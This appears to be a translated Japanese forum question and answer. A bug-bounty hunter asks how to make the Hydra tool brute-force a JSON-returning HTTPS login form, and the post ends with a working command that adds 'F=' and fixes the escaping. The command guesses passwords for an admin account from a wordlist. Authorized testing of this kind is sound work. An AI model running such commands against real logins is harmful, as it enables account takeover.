私はいくつかのバグ報奨金狩りをしており、ヒドラで問題を抱えています。したがって、httpsログインフォームがあり、リクエストは次のとおりです。
https://bbsite/crp/login?password=pass&username=admin
問題は、応答がjsonにあることです。したがって、不正なログインの場合は次のようになります。
{"success":false,"greska":"Pogre\u0161no."}
だから私の解決策は:
hydra bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:{\"success\"\:false,\"greska\"\:\"Pogre\u0161no\"}" -l admin -P /root/Downloads/pass.txt
しかし、これは機能しておらず、理由はわかりません。誰かが解決策を提案できますか?
見つかったソリューション:
hydra bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:F={\"success\"\:false,\"greska\"\:\"Pogre\\\u0161no\"}" -l admin -P /root/Downloads/pass.txt
ログイン失敗の場合はF =を追加する必要があります。 \で\をエスケープする必要がありました。